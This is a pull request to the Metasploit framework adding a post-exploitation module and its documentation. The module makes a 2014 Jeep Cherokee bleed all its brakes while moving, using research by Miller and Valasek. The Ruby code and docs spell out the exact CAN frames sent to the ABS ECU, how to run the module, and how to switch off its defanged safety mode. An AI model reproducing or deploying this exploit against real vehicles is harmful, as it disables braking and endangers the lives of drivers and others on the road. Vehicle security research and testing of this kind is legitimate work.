### PR TITLE
Add 2014 Jeep Cherokee Bleed Brakes

### DIFF
--- a/documentation/modules/post/hardware/automotive/cherokee_kill_brakes.md
+++ b/documentation/modules/post/hardware/automotive/cherokee_kill_brakes.md
@@ -1,0 +1,85 @@
+## Introduction
+This module will bleed all the brakes on the 2014 Jeep Cherokee while the car is moving. This has the result that the brakes will 
+not work during this time and has significant safety issues, even if it only works if you are driving slowly.
+
+References:
+https://ioactive.com/wp-content/uploads/2018/05/IOActive_Remote_Car_Hacking-1.pdf
+http://www.illmatics.com/Remote%20Car%20Hacking.pdf
+
+Authors:
+Charlie Miller # Original Author and Researcher 
+Chris Valasek# Original Author and Researcher
+Jay Turla # Metasploit Module
+
+## Verification Steps
+
+Fire up virtual CAN bus:
+
+1. `sudo modprobe can`
+2. `sudo modprobe vcan`
+3. `sudo ip link add dev vcan0 type vcan`
+4. `sudo ip link set up vcan0`
+
+Launch msf:
+
+5. Start `msfconsole`
+6. `use auxiliary/server/local_hwbridge`
+7. `set uripath testbus`
+8. `run`
+9. `use auxiliary/client/hwbridge/connect`
+10. `set targeturi testbus`
+
+## Options
+
+```
+Module options (post/hardware/automotive/cherokee_kill_brakes):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   CANBUS                    no        CAN Bus to perform scan on, defaults to connected bus
+   SESSION                   yes       The session to run this module on.
+```
+
+## Scenarios
+You can test this module doing a candump wherein the first CAN Frame will start a diagnostic session with the ABS ECU and then bleed all the brakes at maximum which contains one message (InputOutput) but requires multiple CAN messages since the data is too long to fit in a single CAN frame.
+
+```
+msf5 auxiliary(client/hwbridge/connect) > run
+[*] Running module against 127.0.0.1
+
+[*] Attempting to connect to 127.0.0.1...
+[*] Hardware bridge interface session 1 opened (127.0.0.1 -> 127.0.0.1) at 2019-09-11 04:59:40 -0700
+[+] HWBridge session established
+[*] HW Specialty: {"automotive"=>true}  Capabilities: {"can"=>true, "custom_methods"=>true}
+[!] NOTICE:  You are about to leave the matrix.  All actions performed on this hardware bridge
+[!]          could have real world consequences.  Use this module in a controlled testing
+[!]          environment and with equipment you are authorized to perform testing on.
+[*] Auxiliary module execution completed
+msf5 auxiliary(client/hwbridge/connect) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                   Information  Connection
+  --  ----  ----                   -----------  ----------
+  1         hwbridge cmd/hardware  automotive   127.0.0.1 -> 127.0.0.1 (127.0.0.1)
+
+msf5 auxiliary(client/hwbridge/connect) > sessions -i 1
+[*] Starting interaction with 1...
+
+hwbridge > run post/hardware/automotive/cherokee_kill_brakes CANBUS=vcan0
+
+[*] Starting a diagnostic session with the ABS ECU...
+[*] -- Bleeding all the brakes at maximum --
+hwbridge > 
+```
+
+You can use candump to verify the CAN frames being sent:
+
+```
+└─# candump vcan0           
+  vcan0  18DA28F1   [8]  02 10 03 00 00 00 00 00
+  vcan0  18DA28F1   [8]  10 11 2F 5A BF 03 64 64
+  vcan0  18DA28F1   [8]  64 64 64 64 64 64 64 64
+  vcan0  18DA28F1   [8]  64 64 64 00 00 00 00 00
+```

--- a/documentation/modules/post/hardware/automotive/cherokee_kill_brakes.md
+++ b/documentation/modules/post/hardware/automotive/cherokee_kill_brakes.md
@@ -8,7 +8,7 @@ http://www.illmatics.com/Remote%20Car%20Hacking.pdf
 
 Authors:
 Charlie Miller # Original Author and Researcher 
-Chris Valasek# Original Author and Researcher
+Chris Valasek # Original Author and Researcher
 Jay Turla # Metasploit Module
 
 ## Verification Steps
@@ -40,6 +40,15 @@ Module options (post/hardware/automotive/cherokee_kill_brakes):
    SESSION                   yes       The session to run this module on.
 ```
 
+**CANBUS**
+CAN Bus to perform scan on, defaults to connected bus
+
+**SESSION**
+The session to run this module on.
+
+**DefangedMode**
+Set this to `false` to disable defanged mode and enable module functionality. Set this only if you're SURE you want to proceed.
+
 ## Scenarios
 You can test this module doing a candump wherein the first CAN Frame will start a diagnostic session with the ABS ECU and then bleed all the brakes at maximum which contains one message (InputOutput) but requires multiple CAN messages since the data is too long to fit in a single CAN frame.
 
@@ -64,14 +73,18 @@ Active sessions
   --  ----  ----                   -----------  ----------
   1         hwbridge cmd/hardware  automotive   127.0.0.1 -> 127.0.0.1 (127.0.0.1)
 
-msf5 auxiliary(client/hwbridge/connect) > sessions -i 1
-[*] Starting interaction with 1...
-
-hwbridge > run post/hardware/automotive/cherokee_kill_brakes CANBUS=vcan0
+msf6 auxiliary(client/hwbridge/connect) > use post/hardware/automotive/cherokee_kill_brakes
+msf6 post(hardware/automotive/cherokee_kill_brakes) > set session 1
+session => 1
+msf6 post(hardware/automotive/cherokee_kill_brakes) > set CANBUS vcan0
+CANBUS => vcan0
+msf6 post(hardware/automotive/cherokee_kill_brakes) > set VERBOSE true
+msf6 post(hardware/automotive/cherokee_kill_brakes) > set DefangedMode false
+msf6 post(hardware/automotive/cherokee_kill_brakes) > run
 
 [*] Starting a diagnostic session with the ABS ECU...
 [*] -- Bleeding all the brakes at maximum --
-hwbridge > 
+[*] Post module execution completed
 ```
 
 You can use candump to verify the CAN frames being sent:

--- a/modules/post/hardware/automotive/cherokee_kill_brakes.rb
+++ b/modules/post/hardware/automotive/cherokee_kill_brakes.rb
@@ -1,0 +1,53 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => '2014 Jeep Cherokee Bleed Brakes',
+        'Description' => %q{
+          This module will bleed all the brakes on the 2014 Jeep Cherokee while the car is moving.
+          This has the result that the brakes will not work during this time and has significant
+          safety issues, even if it only works if you are driving slowly. 
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Charlie Miller', # Original Research 
+          'Chris Valasek', # Original Research
+          'Jay Turla' # Metasploit Module
+        ],
+        'References' => [
+          ['URL', 'https://ioactive.com/wp-content/uploads/2018/05/IOActive_Remote_Car_Hacking-1.pdf'],
+          ['URL', 'http://www.illmatics.com/Remote%20Car%20Hacking.pdf']
+        ],
+        'Platform' => ['hardware'],
+        'SessionTypes' => ['hwbridge'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [PHYSICAL_EFFECTS],
+          'Reliability' => []
+        }
+      )
+    )
+    register_options([
+      OptString.new('CANBUS', [false, 'CAN Bus to perform scan on, defaults to connected bus', nil])
+    ])
+  end
+
+  def run
+    unless client.automotive
+      print_error('The hwbridge requires a functional automotive extention')
+      return
+    end
+    print_status('Starting a diagnostic session with the ABS ECU...')
+    client.automotive.cansend(datastore['CANBUS'], '18DA28F1', '0210030000000000')
+    print_status('-- Bleeding all the brakes at maximum --')
+    client.automotive.cansend(datastore['CANBUS'], '18DA28F1', '10112F5ABF036464')
+    client.automotive.cansend(datastore['CANBUS'], '18DA28F1', '6464646464646464')
+    client.automotive.cansend(datastore['CANBUS'], '18DA28F1', '6464640000000000')
+  end
+end

--- a/modules/post/hardware/automotive/cherokee_kill_brakes.rb
+++ b/modules/post/hardware/automotive/cherokee_kill_brakes.rb
@@ -12,11 +12,11 @@ class MetasploitModule < Msf::Post
         'Description' => %q{
           This module will bleed all the brakes on the 2014 Jeep Cherokee while the car is moving.
           This has the result that the brakes will not work during this time and has significant
-          safety issues, even if it only works if you are driving slowly. 
+          safety issues, even if it only works if you are driving slowly.
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'Charlie Miller', # Original Research 
+          'Charlie Miller', # Original Research
           'Chris Valasek', # Original Research
           'Jay Turla' # Metasploit Module
         ],

--- a/modules/post/hardware/automotive/cherokee_kill_brakes.rb
+++ b/modules/post/hardware/automotive/cherokee_kill_brakes.rb
@@ -12,11 +12,11 @@ class MetasploitModule < Msf::Post
         'Description' => %q{
           This module will bleed all the brakes on the 2014 Jeep Cherokee while the car is moving.
           This has the result that the brakes will not work during this time and has significant
-          safety issues, even if it only works if you are driving slowly.
+          safety issues, even if it only works if you are driving slowly. 
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'Charlie Miller', # Original Research
+          'Charlie Miller', # Original Research 
           'Chris Valasek', # Original Research
           'Jay Turla' # Metasploit Module
         ],
@@ -36,9 +36,19 @@ class MetasploitModule < Msf::Post
     register_options([
       OptString.new('CANBUS', [false, 'CAN Bus to perform scan on, defaults to connected bus', nil])
     ])
+
+    register_advanced_options([
+      OptBool.new('DefangedMode', [true, 'Run in defanged mode', true])
+    ])
   end
 
   def run
+    if datastore['DefangedMode']
+      print_error('Running in defanged mode')
+      print_error('Set this to false to disable defanged mode and enable module functionality.')
+      return
+    end
+
     unless client.automotive
       print_error('The hwbridge requires a functional automotive extention')
       return


### PR DESCRIPTION
## Introduction
This module will bleed all the brakes on the 2014 Jeep Cherokee while the car is moving. This has the result that the brakes will 
not work during this time and has significant safety issues, even if it only works if you are driving slowly.

References:
https://ioactive.com/wp-content/uploads/2018/05/IOActive_Remote_Car_Hacking-1.pdf
http://www.illmatics.com/Remote%20Car%20Hacking.pdf

Authors:
Charlie Miller # Original Author and Researcher 
Chris Valasek # Original Author and Researcher
Jay Turla # Metasploit Module

## Verification Steps

Fire up virtual CAN bus:

1. `sudo modprobe can`
2. `sudo modprobe vcan`
3. `sudo ip link add dev vcan0 type vcan`
4. `sudo ip link set up vcan0`

Launch msf:

5. Start `msfconsole`
6. `use auxiliary/server/local_hwbridge`
7. `set uripath testbus`
8. `run`
9. `use auxiliary/client/hwbridge/connect`
10. `set targeturi testbus`

## Options

```
Module options (post/hardware/automotive/cherokee_kill_brakes):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CANBUS                    no        CAN Bus to perform scan on, defaults to connected bus
   SESSION                   yes       The session to run this module on.
```

**CANBUS**
CAN Bus to perform scan on, defaults to connected bus

**SESSION**
The session to run this module on.

**DefangedMode**
Set this to `false` to disable defanged mode and enable module functionality. Set this only if you're SURE you want to proceed.

## Scenarios
You can test this module doing a candump wherein the first CAN Frame will start a diagnostic session with the ABS ECU and then bleed all the brakes at maximum which contains one message (InputOutput) but requires multiple CAN messages since the data is too long to fit in a single CAN frame.

```
msf5 auxiliary(client/hwbridge/connect) > run
[*] Running module against 127.0.0.1

[*] Attempting to connect to 127.0.0.1...
[*] Hardware bridge interface session 1 opened (127.0.0.1 -> 127.0.0.1) at 2019-09-11 04:59:40 -0700
[+] HWBridge session established
[*] HW Specialty: {"automotive"=>true}  Capabilities: {"can"=>true, "custom_methods"=>true}
[!] NOTICE:  You are about to leave the matrix.  All actions performed on this hardware bridge
[!]          could have real world consequences.  Use this module in a controlled testing
[!]          environment and with equipment you are authorized to perform testing on.
[*] Auxiliary module execution completed
msf5 auxiliary(client/hwbridge/connect) > sessions

Active sessions
===============

  Id  Name  Type                   Information  Connection
  --  ----  ----                   -----------  ----------
  1         hwbridge cmd/hardware  automotive   127.0.0.1 -> 127.0.0.1 (127.0.0.1)

msf6 auxiliary(client/hwbridge/connect) > use post/hardware/automotive/cherokee_kill_brakes
msf6 post(hardware/automotive/cherokee_kill_brakes) > set session 1
session => 1
msf6 post(hardware/automotive/cherokee_kill_brakes) > set CANBUS vcan0
CANBUS => vcan0
msf6 post(hardware/automotive/cherokee_kill_brakes) > set VERBOSE true
msf6 post(hardware/automotive/cherokee_kill_brakes) > set DefangedMode false
msf6 post(hardware/automotive/cherokee_kill_brakes) > run

[*] Starting a diagnostic session with the ABS ECU...
[*] -- Bleeding all the brakes at maximum --
[*] Post module execution completed
```

You can use candump to verify the CAN frames being sent:

```
└─# candump vcan0           
  vcan0  18DA28F1   [8]  02 10 03 00 00 00 00 00
  vcan0  18DA28F1   [8]  10 11 2F 5A BF 03 64 64
  vcan0  18DA28F1   [8]  64 64 64 64 64 64 64 64
  vcan0  18DA28F1   [8]  64 64 64 00 00 00 00 00
```

This can be seen in the PoC of Charlie Miller and Chris Valasek.

![image](https://user-images.githubusercontent.com/3483615/136453012-2a0fc899-0c93-45d2-94bb-469510903c90.png)

